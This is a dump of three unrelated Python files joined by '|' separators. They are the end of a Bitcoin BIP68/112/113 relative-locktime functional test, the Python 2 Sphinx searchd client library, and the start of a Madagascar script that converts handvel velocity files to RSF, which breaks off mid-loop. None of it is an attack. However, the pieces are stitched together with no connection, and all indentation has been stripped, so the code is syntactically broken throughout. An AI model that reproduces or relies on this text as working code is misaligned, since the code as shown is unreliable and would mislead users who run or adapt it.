# SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV for all remaining txs ##
# All txs with nSequence 9 should fail either due to earlier mismatch or failing the CSV check
fail_txs = all_rlt_txs(bip112txs_vary_nSequence_9_v2)
fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v2 if not tx['sdf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in nSequence, tx should fail
fail_txs = [tx['tx'] for tx in bip112txs_vary_nSequence_v2 if tx['sdf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# If sequencelock types mismatch, tx should fail
fail_txs = [tx['tx'] for tx in bip112txs_vary_nSequence_v2 if not tx['sdf'] and tx['stf']]
fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if not tx['sdf'] and tx['stf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# Remaining txs should pass, just test masking works properly
success_txs = [tx['tx'] for tx in bip112txs_vary_nSequence_v2 if not tx['sdf'] and not tx['stf']]
success_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if not tx['sdf'] and not tx['stf']]
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Additional test, of checking that comparison of two time types works properly
time_txs = []
for tx in [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if not tx['sdf'] and tx['stf']]:
tx.vin[0].nSequence = BASE_RELATIVE_LOCKTIME | SEQ_TYPE_FLAG
signtx = sign_transaction(self.nodes[0], tx)
time_txs.append(signtx)
self.sync_blocks([self.create_test_block(time_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# TODO: Test empty stack fails
if __name__ == '__main__':
BIP68_112_113Test().main()
|
import sys
import select
import socket
import re
from struct import *
SEARCHD_COMMAND_SEARCH = 0
SEARCHD_COMMAND_EXCERPT = 1
SEARCHD_COMMAND_UPDATE = 2
SEARCHD_COMMAND_KEYWORDS = 3
SEARCHD_COMMAND_PERSIST = 4
SEARCHD_COMMAND_FLUSHATTRS = 7
VER_COMMAND_SEARCH = 0x118
VER_COMMAND_EXCERPT = 0x103
VER_COMMAND_UPDATE = 0x102
VER_COMMAND_KEYWORDS = 0x100
VER_COMMAND_FLUSHATTRS = 0x100
SEARCHD_OK = 0
SEARCHD_ERROR = 1
SEARCHD_RETRY = 2
SEARCHD_WARNING = 3
SPH_MATCH_ALL = 0
SPH_MATCH_ANY = 1
SPH_MATCH_PHRASE = 2
SPH_MATCH_BOOLEAN = 3
SPH_MATCH_EXTENDED = 4
SPH_MATCH_FULLSCAN = 5
SPH_MATCH_EXTENDED2 = 6
SPH_RANK_PROXIMITY_BM25 = 0 # default mode, phrase proximity major factor and BM25 minor one
SPH_RANK_BM25 = 1 # statistical mode, BM25 ranking only (faster but worse quality)
SPH_RANK_NONE = 2 # no ranking, all matches get a weight of 1
SPH_RANK_WORDCOUNT = 3 # simple word-count weighting, rank is a weighted sum of per-field keyword occurence counts
SPH_RANK_PROXIMITY = 4
SPH_RANK_MATCHANY = 5
SPH_RANK_FIELDMASK = 6
SPH_RANK_SPH04 = 7
SPH_RANK_TOTAL = 8
SPH_SORT_RELEVANCE = 0
SPH_SORT_ATTR_DESC = 1
SPH_SORT_ATTR_ASC = 2
SPH_SORT_TIME_SEGMENTS = 3
SPH_SORT_EXTENDED = 4
SPH_SORT_EXPR = 5
SPH_FILTER_VALUES = 0
SPH_FILTER_RANGE = 1
SPH_FILTER_FLOATRANGE = 2
SPH_ATTR_NONE = 0
SPH_ATTR_INTEGER = 1
SPH_ATTR_TIMESTAMP = 2
SPH_ATTR_ORDINAL = 3
SPH_ATTR_BOOL = 4
SPH_ATTR_FLOAT = 5
SPH_ATTR_BIGINT = 6
SPH_ATTR_STRING = 7
SPH_ATTR_MULTI = 0X40000000L
SPH_ATTR_TYPES = (SPH_ATTR_NONE,
SPH_ATTR_INTEGER,
SPH_ATTR_TIMESTAMP,
SPH_ATTR_ORDINAL,
SPH_ATTR_BOOL,
SPH_ATTR_FLOAT,
SPH_ATTR_BIGINT,
SPH_ATTR_STRING,
SPH_ATTR_MULTI)
SPH_GROUPBY_DAY = 0
SPH_GROUPBY_WEEK = 1
SPH_GROUPBY_MONTH = 2
SPH_GROUPBY_YEAR = 3
SPH_GROUPBY_ATTR = 4
SPH_GROUPBY_ATTRPAIR = 5
class SphinxClient:
def __init__ (self):
"""
Create a new client object, and fill defaults.
"""
self._host = 'localhost' # searchd host (default is "localhost")
self._port = 9312 # searchd port (default is 9312)
self._path = None # searchd unix-domain socket path
self._socket = None
self._offset = 0 # how much records to seek from result-set start (default is 0)
self._limit = 20 # how much records to return from result-set starting at offset (default is 20)
self._mode = SPH_MATCH_ALL # query matching mode (default is SPH_MATCH_ALL)
self._weights = [] # per-field weights (default is 1 for all fields)
self._sort = SPH_SORT_RELEVANCE # match sorting mode (default is SPH_SORT_RELEVANCE)
self._sortby = '' # attribute to sort by (defualt is "")
self._min_id = 0 # min ID to match (default is 0)
self._max_id = 0 # max ID to match (default is UINT_MAX)
self._filters = [] # search filters
self._groupby = '' # group-by attribute name
self._groupfunc = SPH_GROUPBY_DAY # group-by function (to pre-process group-by attribute value with)
self._groupsort = '@group desc' # group-by sorting clause (to sort groups in result set with)
self._groupdistinct = '' # group-by count-distinct attribute
self._maxmatches = 1000 # max matches to retrieve
self._cutoff = 0 # cutoff to stop searching at
self._retrycount = 0 # distributed retry count
self._retrydelay = 0 # distributed retry delay
self._anchor = {} # geographical anchor point
self._indexweights = {} # per-index weights
self._ranker = SPH_RANK_PROXIMITY_BM25 # ranking mode
self._maxquerytime = 0 # max query time, milliseconds (default is 0, do not limit)
self._fieldweights = {} # per-field-name weights
self._overrides = {} # per-query attribute values overrides
self._select = '*' # select-list (attributes or expressions, with optional aliases)
self._error = '' # last error message
self._warning = '' # last warning message
self._reqs = [] # requests array for multi-query
def __del__ (self):
if self._socket:
self._socket.close()
def GetLastError (self):
"""
Get last error message (string).
"""
return self._error
def GetLastWarning (self):
"""
Get last warning message (string).
"""
return self._warning
def SetServer (self, host, port = None):
"""
Set searchd server host and port.
"""
assert(isinstance(host, str))
if host.startswith('/'):
self._path = host
return
elif host.startswith('unix://'):
self._path = host[7:]
return
assert(isinstance(port, int))
self._host = host
self._port = port
self._path = None
def _Connect (self):
"""
INTERNAL METHOD, DO NOT CALL. Connects to searchd server.
"""
if self._socket:
# we have a socket, but is it still alive?
sr, sw, _ = select.select ( [self._socket], [self._socket], [], 0 )
# this is how alive socket should look
if len(sr)==0 and len(sw)==1:
return self._socket
# oops, looks like it was closed, lets reopen
self._socket.close()
self._socket = None
try:
if self._path:
af = socket.AF_UNIX
addr = self._path
desc = self._path
else:
af = socket.AF_INET
addr = ( self._host, self._port )
desc = '%s;%s' % addr
sock = socket.socket ( af, socket.SOCK_STREAM )
sock.connect ( addr )
except socket.error, msg:
if sock:
sock.close()
self._error = 'connection to %s failed (%s)' % ( desc, msg )
return
v = unpack('>L', sock.recv(4))
if v<1:
sock.close()
self._error = 'expected searchd protocol version, got %s' % v
return
# all ok, send my version
sock.send(pack('>L', 1))
return sock
def _GetResponse (self, sock, client_ver):
"""
INTERNAL METHOD, DO NOT CALL. Gets and checks response packet from searchd server.
"""
(status, ver, length) = unpack('>2HL', sock.recv(8))
response = ''
left = length
while left>0:
chunk = sock.recv(left)
if chunk:
response += chunk
left -= len(chunk)
else:
break
if not self._socket:
sock.close()
# check response
read = len(response)
if not response or read!=length:
if length:
self._error = 'failed to read searchd response (status=%s, ver=%s, len=%s, read=%s)' \
% (status, ver, length, read)
else:
self._error = 'received zero-sized searchd response'
return None
# check status
if status==SEARCHD_WARNING:
wend = 4 + unpack ( '>L', response[0:4] )[0]
self._warning = response[4:wend]
return response[wend:]
if status==SEARCHD_ERROR:
self._error = 'searchd error: '+response[4:]
return None
if status==SEARCHD_RETRY:
self._error = 'temporary searchd error: '+response[4:]
return None
if status!=SEARCHD_OK:
self._error = 'unknown status code %d' % status
return None
# check version
if ver<client_ver:
self._warning = 'searchd command v.%d.%d older than client\'s v.%d.%d, some options might not work' \
% (ver>>8, ver&0xff, client_ver>>8, client_ver&0xff)
return response
def SetLimits (self, offset, limit, maxmatches=0, cutoff=0):
"""
Set offset and count into result set, and optionally set max-matches and cutoff limits.
"""
assert ( type(offset) in [int,long] and 0<=offset<16777216 )
assert ( type(limit) in [int,long] and 0<limit<16777216 )
assert(maxmatches>=0)
self._offset = offset
self._limit = limit
if maxmatches>0:
self._maxmatches = maxmatches
if cutoff>=0:
self._cutoff = cutoff
def SetMaxQueryTime (self, maxquerytime):
"""
Set maximum query time, in milliseconds, per-index. 0 means 'do not limit'.
"""
assert(isinstance(maxquerytime,int) and maxquerytime>0)
self._maxquerytime = maxquerytime
def SetMatchMode (self, mode):
"""
Set matching mode.
"""
assert(mode in [SPH_MATCH_ALL, SPH_MATCH_ANY, SPH_MATCH_PHRASE, SPH_MATCH_BOOLEAN, SPH_MATCH_EXTENDED, SPH_MATCH_FULLSCAN, SPH_MATCH_EXTENDED2])
self._mode = mode
def SetRankingMode (self, ranker):
"""
Set ranking mode.
"""
assert(ranker>=0 and ranker<SPH_RANK_TOTAL)
self._ranker = ranker
def SetSortMode ( self, mode, clause='' ):
"""
Set sorting mode.
"""
assert ( mode in [SPH_SORT_RELEVANCE, SPH_SORT_ATTR_DESC, SPH_SORT_ATTR_ASC, SPH_SORT_TIME_SEGMENTS, SPH_SORT_EXTENDED, SPH_SORT_EXPR] )
assert ( isinstance ( clause, str ) )
self._sort = mode
self._sortby = clause
def SetWeights (self, weights):
"""
Set per-field weights.
WARNING, DEPRECATED; do not use it! use SetFieldWeights() instead
"""
assert(isinstance(weights, list))
for w in weights:
AssertUInt32 ( w )
self._weights = weights
def SetFieldWeights (self, weights):
"""
Bind per-field weights by name; expects (name,field_weight) dictionary as argument.
"""
assert(isinstance(weights,dict))
for key,val in weights.items():
assert(isinstance(key,str))
AssertUInt32 ( val )
self._fieldweights = weights
def SetIndexWeights (self, weights):
"""
Bind per-index weights by name; expects (name,index_weight) dictionary as argument.
"""
assert(isinstance(weights,dict))
for key,val in weights.items():
assert(isinstance(key,str))
AssertUInt32(val)
self._indexweights = weights
def SetIDRange (self, minid, maxid):
"""
Set IDs range to match.
Only match records if document ID is beetwen $min and $max (inclusive).
"""
assert(isinstance(minid, (int, long)))
assert(isinstance(maxid, (int, long)))
assert(minid<=maxid)
self._min_id = minid
self._max_id = maxid
def SetFilter ( self, attribute, values, exclude=0 ):
"""
Set values set filter.
Only match records where 'attribute' value is in given 'values' set.
"""
assert(isinstance(attribute, str))
assert iter(values)
for value in values:
AssertInt32 ( value )
self._filters.append ( { 'type':SPH_FILTER_VALUES, 'attr':attribute, 'exclude':exclude, 'values':values } )
def SetFilterRange (self, attribute, min_, max_, exclude=0 ):
"""
Set range filter.
Only match records if 'attribute' value is beetwen 'min_' and 'max_' (inclusive).
"""
assert(isinstance(attribute, str))
AssertInt32(min_)
AssertInt32(max_)
assert(min_<=max_)
self._filters.append ( { 'type':SPH_FILTER_RANGE, 'attr':attribute, 'exclude':exclude, 'min':min_, 'max':max_ } )
def SetFilterFloatRange (self, attribute, min_, max_, exclude=0 ):
assert(isinstance(attribute,str))
assert(isinstance(min_,float))
assert(isinstance(max_,float))
assert(min_ <= max_)
self._filters.append ( {'type':SPH_FILTER_FLOATRANGE, 'attr':attribute, 'exclude':exclude, 'min':min_, 'max':max_} )
def SetGeoAnchor (self, attrlat, attrlong, latitude, longitude):
assert(isinstance(attrlat,str))
assert(isinstance(attrlong,str))
assert(isinstance(latitude,float))
assert(isinstance(longitude,float))
self._anchor['attrlat'] = attrlat
self._anchor['attrlong'] = attrlong
self._anchor['lat'] = latitude
self._anchor['long'] = longitude
def SetGroupBy ( self, attribute, func, groupsort='@group desc' ):
"""
Set grouping attribute and function.
"""
assert(isinstance(attribute, str))
assert(func in [SPH_GROUPBY_DAY, SPH_GROUPBY_WEEK, SPH_GROUPBY_MONTH, SPH_GROUPBY_YEAR, SPH_GROUPBY_ATTR, SPH_GROUPBY_ATTRPAIR] )
assert(isinstance(groupsort, str))
self._groupby = attribute
self._groupfunc = func
self._groupsort = groupsort
def SetGroupDistinct (self, attribute):
assert(isinstance(attribute,str))
self._groupdistinct = attribute
def SetRetries (self, count, delay=0):
assert(isinstance(count,int) and count>=0)
assert(isinstance(delay,int) and delay>=0)
self._retrycount = count
self._retrydelay = delay
def SetOverride (self, name, type, values):
assert(isinstance(name, str))
assert(type in SPH_ATTR_TYPES)
assert(isinstance(values, dict))
self._overrides[name] = {'name': name, 'type': type, 'values': values}
def SetSelect (self, select):
assert(isinstance(select, str))
self._select = select
def ResetOverrides (self):
self._overrides = {}
def ResetFilters (self):
"""
Clear all filters (for multi-queries).
"""
self._filters = []
self._anchor = {}
def ResetGroupBy (self):
"""
Clear groupby settings (for multi-queries).
"""
self._groupby = ''
self._groupfunc = SPH_GROUPBY_DAY
self._groupsort = '@group desc'
self._groupdistinct = ''
def Query (self, query, index='*', comment=''):
"""
Connect to searchd server and run given search query.
Returns None on failure; result set hash on success (see documentation for details).
"""
assert(len(self._reqs)==0)
self.AddQuery(query,index,comment)
results = self.RunQueries()
self._reqs = [] # we won't re-run erroneous batch
if not results or len(results)==0:
return None
self._error = results[0]['error']
self._warning = results[0]['warning']
if results[0]['status'] == SEARCHD_ERROR:
return None
return results[0]
def AddQuery (self, query, index='*', comment=''):
"""
Add query to batch.
"""
# build request
req = []
req.append ( pack('>5L', self._offset, self._limit, self._mode, self._ranker, self._sort) )
req.append(pack('>L', len(self._sortby)))
req.append(self._sortby)
if isinstance(query,unicode):
query = query.encode('utf-8')
assert(isinstance(query,str))
req.append(pack('>L', len(query)))
req.append(query)
req.append(pack('>L', len(self._weights)))
for w in self._weights:
req.append(pack('>L', w))
req.append(pack('>L', len(index)))
req.append(index)
req.append(pack('>L',1)) # id64 range marker
req.append(pack('>Q', self._min_id))
req.append(pack('>Q', self._max_id))
# filters
req.append ( pack ( '>L', len(self._filters) ) )
for f in self._filters:
req.append ( pack ( '>L', len(f['attr'])) + f['attr'])
filtertype = f['type']
req.append ( pack ( '>L', filtertype))
if filtertype == SPH_FILTER_VALUES:
req.append ( pack ('>L', len(f['values'])))
for val in f['values']:
req.append ( pack ('>q', val))
elif filtertype == SPH_FILTER_RANGE:
req.append ( pack ('>2q', f['min'], f['max']))
elif filtertype == SPH_FILTER_FLOATRANGE:
req.append ( pack ('>2f', f['min'], f['max']))
req.append ( pack ( '>L', f['exclude'] ) )
# group-by, max-matches, group-sort
req.append ( pack ( '>2L', self._groupfunc, len(self._groupby) ) )
req.append ( self._groupby )
req.append ( pack ( '>2L', self._maxmatches, len(self._groupsort) ) )
req.append ( self._groupsort )
req.append ( pack ( '>LLL', self._cutoff, self._retrycount, self._retrydelay))
req.append ( pack ( '>L', len(self._groupdistinct)))
req.append ( self._groupdistinct)
# anchor point
if len(self._anchor) == 0:
req.append ( pack ('>L', 0))
else:
attrlat, attrlong = self._anchor['attrlat'], self._anchor['attrlong']
latitude, longitude = self._anchor['lat'], self._anchor['long']
req.append ( pack ('>L', 1))
req.append ( pack ('>L', len(attrlat)) + attrlat)
req.append ( pack ('>L', len(attrlong)) + attrlong)
req.append ( pack ('>f', latitude) + pack ('>f', longitude))
# per-index weights
req.append ( pack ('>L',len(self._indexweights)))
for indx,weight in self._indexweights.items():
req.append ( pack ('>L',len(indx)) + indx + pack ('>L',weight))
# max query time
req.append ( pack ('>L', self._maxquerytime) )
# per-field weights
req.append ( pack ('>L',len(self._fieldweights) ) )
for field,weight in self._fieldweights.items():
req.append ( pack ('>L',len(field)) + field + pack ('>L',weight) )
# comment
req.append ( pack('>L',len(comment)) + comment )
# attribute overrides
req.append ( pack('>L', len(self._overrides)) )
for v in self._overrides.values():
req.extend ( ( pack('>L', len(v['name'])), v['name'] ) )
req.append ( pack('>LL', v['type'], len(v['values'])) )
for id, value in v['values'].iteritems():
req.append ( pack('>Q', id) )
if v['type'] == SPH_ATTR_FLOAT:
req.append ( pack('>f', value) )
elif v['type'] == SPH_ATTR_BIGINT:
req.append ( pack('>q', value) )
else:
req.append ( pack('>l', value) )
# select-list
req.append ( pack('>L', len(self._select)) )
req.append ( self._select )
# send query, get response
req = ''.join(req)
self._reqs.append(req)
return
def RunQueries (self):
"""
Run queries batch.
Returns None on network IO failure; or an array of result set hashes on success.
"""
if len(self._reqs)==0:
self._error = 'no queries defined, issue AddQuery() first'
return None
sock = self._Connect()
if not sock:
return None
req = ''.join(self._reqs)
length = len(req)+8
req = pack('>HHLLL', SEARCHD_COMMAND_SEARCH, VER_COMMAND_SEARCH, length, 0, len(self._reqs))+req
sock.send(req)
response = self._GetResponse(sock, VER_COMMAND_SEARCH)
if not response:
return None
nreqs = len(self._reqs)
# parse response
max_ = len(response)
p = 0
results = []
for i in range(0,nreqs,1):
result = {}
results.append(result)
result['error'] = ''
result['warning'] = ''
status = unpack('>L', response[p:p+4])[0]
p += 4
result['status'] = status
if status != SEARCHD_OK:
length = unpack('>L', response[p:p+4])[0]
p += 4
message = response[p:p+length]
p += length
if status == SEARCHD_WARNING:
result['warning'] = message
else:
result['error'] = message
continue
# read schema
fields = []
attrs = []
nfields = unpack('>L', response[p:p+4])[0]
p += 4
while nfields>0 and p<max_:
nfields -= 1
length = unpack('>L', response[p:p+4])[0]
p += 4
fields.append(response[p:p+length])
p += length
result['fields'] = fields
nattrs = unpack('>L', response[p:p+4])[0]
p += 4
while nattrs>0 and p<max_:
nattrs -= 1
length = unpack('>L', response[p:p+4])[0]
p += 4
attr = response[p:p+length]
p += length
type_ = unpack('>L', response[p:p+4])[0]
p += 4
attrs.append([attr,type_])
result['attrs'] = attrs
# read match count
count = unpack('>L', response[p:p+4])[0]
p += 4
id64 = unpack('>L', response[p:p+4])[0]
p += 4
# read matches
result['matches'] = []
while count>0 and p<max_:
count -= 1
if id64:
doc, weight = unpack('>QL', response[p:p+12])
p += 12
else:
doc, weight = unpack('>2L', response[p:p+8])
p += 8
match = { 'id':doc, 'weight':weight, 'attrs':{} }
for i in range(len(attrs)):
if attrs[i][1] == SPH_ATTR_FLOAT:
match['attrs'][attrs[i][0]] = unpack('>f', response[p:p+4])[0]
elif attrs[i][1] == SPH_ATTR_BIGINT:
match['attrs'][attrs[i][0]] = unpack('>q', response[p:p+8])[0]
p += 4
elif attrs[i][1] == SPH_ATTR_STRING:
slen = unpack('>L', response[p:p+4])[0]
p += 4
match['attrs'][attrs[i][0]] = ''
if slen>0:
match['attrs'][attrs[i][0]] = response[p:p+slen]
p += slen-4
elif attrs[i][1] == (SPH_ATTR_MULTI | SPH_ATTR_INTEGER):
match['attrs'][attrs[i][0]] = []
nvals = unpack('>L', response[p:p+4])[0]
p += 4
for n in range(0,nvals,1):
match['attrs'][attrs[i][0]].append(unpack('>L', response[p:p+4])[0])
p += 4
p -= 4
else:
match['attrs'][attrs[i][0]] = unpack('>L', response[p:p+4])[0]
p += 4
result['matches'].append ( match )
result['total'], result['total_found'], result['time'], words = unpack('>4L', response[p:p+16])
result['time'] = '%.3f' % (result['time']/1000.0)
p += 16
result['words'] = []
while words>0:
words -= 1
length = unpack('>L', response[p:p+4])[0]
p += 4
word = response[p:p+length]
p += length
docs, hits = unpack('>2L', response[p:p+8])
p += 8
result['words'].append({'word':word, 'docs':docs, 'hits':hits})
self._reqs = []
return results
def BuildExcerpts (self, docs, index, words, opts=None):
"""
Connect to searchd server and generate exceprts from given documents.
"""
if not opts:
opts = {}
if isinstance(words,unicode):
words = words.encode('utf-8')
assert(isinstance(docs, list))
assert(isinstance(index, str))
assert(isinstance(words, str))
assert(isinstance(opts, dict))
sock = self._Connect()
if not sock:
return None
# fixup options
opts.setdefault('before_match', '<b>')
opts.setdefault('after_match', '</b>')
opts.setdefault('chunk_separator', ' ... ')
opts.setdefault('html_strip_mode', 'index')
opts.setdefault('limit', 256)
opts.setdefault('limit_passages', 0)
opts.setdefault('limit_words', 0)
opts.setdefault('around', 5)
opts.setdefault('start_passage_id', 1)
opts.setdefault('passage_boundary', 'none')
# build request
# v.1.0 req
flags = 1 # (remove spaces)
if opts.get('exact_phrase'): flags |= 2
if opts.get('single_passage'): flags |= 4
if opts.get('use_boundaries'): flags |= 8
if opts.get('weight_order'): flags |= 16
if opts.get('query_mode'): flags |= 32
if opts.get('force_all_words'): flags |= 64
if opts.get('load_files'): flags |= 128
if opts.get('allow_empty'): flags |= 256
if opts.get('emit_zones'): flags |= 256
# mode=0, flags
req = [pack('>2L', 0, flags)]
# req index
req.append(pack('>L', len(index)))
req.append(index)
# req words
req.append(pack('>L', len(words)))
req.append(words)
# options
req.append(pack('>L', len(opts['before_match'])))
req.append(opts['before_match'])
req.append(pack('>L', len(opts['after_match'])))
req.append(opts['after_match'])
req.append(pack('>L', len(opts['chunk_separator'])))
req.append(opts['chunk_separator'])
req.append(pack('>L', int(opts['limit'])))
req.append(pack('>L', int(opts['around'])))
req.append(pack('>L', int(opts['limit_passages'])))
req.append(pack('>L', int(opts['limit_words'])))
req.append(pack('>L', int(opts['start_passage_id'])))
req.append(pack('>L', len(opts['html_strip_mode'])))
req.append((opts['html_strip_mode']))
req.append(pack('>L', len(opts['passage_boundary'])))
req.append((opts['passage_boundary']))
# documents
req.append(pack('>L', len(docs)))
for doc in docs:
if isinstance(doc,unicode):
doc = doc.encode('utf-8')
assert(isinstance(doc, str))
req.append(pack('>L', len(doc)))
req.append(doc)
req = ''.join(req)
# send query, get response
length = len(req)
# add header
req = pack('>2HL', SEARCHD_COMMAND_EXCERPT, VER_COMMAND_EXCERPT, length)+req
wrote = sock.send(req)
response = self._GetResponse(sock, VER_COMMAND_EXCERPT )
if not response:
return []
# parse response
pos = 0
res = []
rlen = len(response)
for i in range(len(docs)):
length = unpack('>L', response[pos:pos+4])[0]
pos += 4
if pos+length > rlen:
self._error = 'incomplete reply'
return []
res.append(response[pos:pos+length])
pos += length
return res
def UpdateAttributes ( self, index, attrs, values, mva=False ):
"""
Update given attribute values on given documents in given indexes.
Returns amount of updated documents (0 or more) on success, or -1 on failure.
'attrs' must be a list of strings.
'values' must be a dict with int key (document ID) and list of int values (new attribute values).
optional boolean parameter 'mva' points that there is update of MVA attributes.
In this case the 'values' must be a dict with int key (document ID) and list of lists of int values
(new MVA attribute values).
Example:
res = cl.UpdateAttributes ( 'test1', [ 'group_id', 'date_added' ], { 2:[123,1000000000], 4:[456,1234567890] } )
"""
assert ( isinstance ( index, str ) )
assert ( isinstance ( attrs, list ) )
assert ( isinstance ( values, dict ) )
for attr in attrs:
assert ( isinstance ( attr, str ) )
for docid, entry in values.items():
AssertUInt32(docid)
assert ( isinstance ( entry, list ) )
assert ( len(attrs)==len(entry) )
for val in entry:
if mva:
assert ( isinstance ( val, list ) )
for vals in val:
AssertInt32(vals)
else:
AssertInt32(val)
# build request
req = [ pack('>L',len(index)), index ]
req.append ( pack('>L',len(attrs)) )
mva_attr = 0
if mva: mva_attr = 1
for attr in attrs:
req.append ( pack('>L',len(attr)) + attr )
req.append ( pack('>L', mva_attr ) )
req.append ( pack('>L',len(values)) )
for docid, entry in values.items():
req.append ( pack('>Q',docid) )
for val in entry:
val_len = val
if mva: val_len = len ( val )
req.append ( pack('>L',val_len ) )
if mva:
for vals in val:
req.append ( pack ('>L',vals) )
# connect, send query, get response
sock = self._Connect()
if not sock:
return None
req = ''.join(req)
length = len(req)
req = pack ( '>2HL', SEARCHD_COMMAND_UPDATE, VER_COMMAND_UPDATE, length ) + req
wrote = sock.send ( req )
response = self._GetResponse ( sock, VER_COMMAND_UPDATE )
if not response:
return -1
# parse response
updated = unpack ( '>L', response[0:4] )[0]
return updated
def BuildKeywords ( self, query, index, hits ):
"""
Connect to searchd server, and generate keywords list for a given query.
Returns None on failure, or a list of keywords on success.
"""
assert ( isinstance ( query, str ) )
assert ( isinstance ( index, str ) )
assert ( isinstance ( hits, int ) )
# build request
req = [ pack ( '>L', len(query) ) + query ]
req.append ( pack ( '>L', len(index) ) + index )
req.append ( pack ( '>L', hits ) )
# connect, send query, get response
sock = self._Connect()
if not sock:
return None
req = ''.join(req)
length = len(req)
req = pack ( '>2HL', SEARCHD_COMMAND_KEYWORDS, VER_COMMAND_KEYWORDS, length ) + req
wrote = sock.send ( req )
response = self._GetResponse ( sock, VER_COMMAND_KEYWORDS )
if not response:
return None
# parse response
res = []
nwords = unpack ( '>L', response[0:4] )[0]
p = 4
max_ = len(response)
while nwords>0 and p<max_:
nwords -= 1
length = unpack ( '>L', response[p:p+4] )[0]
p += 4
tokenized = response[p:p+length]
p += length
length = unpack ( '>L', response[p:p+4] )[0]
p += 4
normalized = response[p:p+length]
p += length
entry = { 'tokenized':tokenized, 'normalized':normalized }
if hits:
entry['docs'], entry['hits'] = unpack ( '>2L', response[p:p+8] )
p += 8
res.append ( entry )
if nwords>0 or p>max_:
self._error = 'incomplete reply'
return None
return res
### persistent connections
def Open(self):
if self._socket:
self._error = 'already connected'
return None
server = self._Connect()
if not server:
return None
# command, command version = 0, body length = 4, body = 1
request = pack ( '>hhII', SEARCHD_COMMAND_PERSIST, 0, 4, 1 )
server.send ( request )
self._socket = server
return True
def Close(self):
if not self._socket:
self._error = 'not connected'
return
self._socket.close()
self._socket = None
def EscapeString(self, string):
return re.sub(r"([=\(\)|\-!@~\"&/\\\^\$\=])", r"\\\1", string)
def FlushAttributes(self):
sock = self._Connect()
if not sock:
return -1
request = pack ( '>hhI', SEARCHD_COMMAND_FLUSHATTRS, VER_COMMAND_FLUSHATTRS, 0 ) # cmd, ver, bodylen
sock.send ( request )
response = self._GetResponse ( sock, VER_COMMAND_FLUSHATTRS )
if not response or len(response)!=4:
self._error = 'unexpected response length'
return -1
tag = unpack ( '>L', response[0:4] )[0]
return tag
def AssertInt32 ( value ):
assert(isinstance(value, (int, long)))
assert(value>=-2**32-1 and value<=2**32-1)
def AssertUInt32 ( value ):
assert(isinstance(value, (int, long)))
assert(value>=0 and value<=2**32-1)
|
'''Converts 2D/3D velocity files from handvel.txt to handvel.rsf
- sfhandvel2rsf < handvels.txt o1=0 d1=.001 n1=3000 > handvel.rsf
- The program converts time samples from ms to s
- The rsf output file will have traces equal to the number
of CMP locations in handvel.txt. You need to interploate
between traces for a denser grid e.g. using sfremap1
- This program uses sfspline for interpolation.
'''
import sys, os, string , tempfile, subprocess, collections, multiprocessing
import rsf.path, rsf.prog
import re
try:
import subprocess
except:
sys.stderr.write("subprocess module is needed")
sys.exit(2)
import rsf.api as salah
basename=os.path.basename(sys.argv[0])
usage= '''
Name
%s
DESCRIPTION
Converts 2D/3D velocity files from handvel.txt to handvel.rsf
SYNOPSIS
%s < handvels.txt o1=0 d1=.001 n1=3000 > handvel.rsf
PARAMETERS
float o1= origin of the first axis
float d1= sampling in the first axis
int n1= size of the first axis
COMMENTS:
-The program converts time samples from ms to s
-The rsf output file will have traces equal to the number
of CMP locations in handvel.txt. You need to interploate
between traces for a denser grid e.g. using sfremap1
-This program uses sfspline default parameters. The program
could possibly be enhanced to work with additional sfinvbin1
parameters.
-Input file is not QCed, thus, check your input file
SOURCE
%s
''' %(basename,basename,sys.argv[0])
bindir = os.path.join(rsf.prog.RSFROOT,'bin')
sfcat = os.path.join(bindir,'sfcat')
sfrm = os.path.join(bindir,'sfrm')
sfinvbin1 = os.path.join(bindir,'sfinvbin1')
sfdd = os.path.join(bindir,'sfdd')
sfput = os.path.join(bindir,'sfput')
sfspline = os.path.join(bindir,'sfspline')
datapath = rsf.path.datapath().rstrip('/')
sftransp = os.path.join(bindir,'sftransp')
def myfunction(l,vs,its,nx,x0,dx):
global sfcat, sfrm, sfinvbin1, sfdd, sfput, datapath,sfspline
vcmd='echo '
# open temp files
vd,vpath = tempfile.mkstemp(suffix=".rsf",dir=datapath,text=True)
tvd,tvpath = tempfile.mkstemp(suffix=".rsf",dir=datapath)
# let me put vel for time o1
if float(its[0]) != o1:
t=o1
v=its[1]
# insert v then t
its.insert(0,v)
its.insert(0,t)
# create cmds for velocity file
for i in range(0,len(its),2):
# time samples are converted to seconds
vcmd=vcmd+ str(float(its[i])/1000.0)+" "+str(float(its[i+1]))+" "
vcmd= vcmd + '''n1=2 n2=%d data_format=ascii_float in=%s\
'''%((len(its)/2),vpath)
#print vcmd
#nx=n1
#dx=d1
#x0=o1
#time velocity command
tvcmd='''%s form=native | %s n1=%d o1=%f d1=%f fp=0,0\
'''%(sfdd,sfspline,nx,x0,dx)
# execute cmds
subprocess.call(vcmd,stdout=vd,shell=True)
os.lseek(vd,0,0)
#print tvcmd
subprocess.call(tvcmd,stdin=vd,stdout=tvd,shell=True)
# maintain a list of interpolated traces
#print vs
# close files
for k in [vd,tvd]:
os.close(k)
for k in [vpath]:
os.remove(k)
vs.append(tvpath)
return
if __name__ == "__main__":
mgr = multiprocessing.Manager()
vs = mgr.list()
par=salah.Par()
n1=par.int("n1") # size of the first axis
o1=par.float("o1") # origin of the first axis
d1=par.float("d1") # sampling in the first axis
#
if not (n1 or o1 or d1):
#sys.stderr.write(usage)
rsf.prog.selfdoc()
sys.exit(2)
if sys.stdout.isatty() or sys.stdin.isatty():
#sys.stderr.write(usage)
rsf.prog.selfdoc()
sys.exit(2)
inline=collections.OrderedDict()
loc=collections.OrderedDict()
i=None
x=None
for line in sys.stdin:
line=line.strip()
if re.match(r"^\*", line):
continue
if re.match(r"^\HANDVEL|^\VFUNC", line):
if 3 != len(line.split()):
sys.stderr.write("wrong input file format\n")
sys.stderr.write("%s\n"%(line))
sys.exit(2)
# get inline and xline
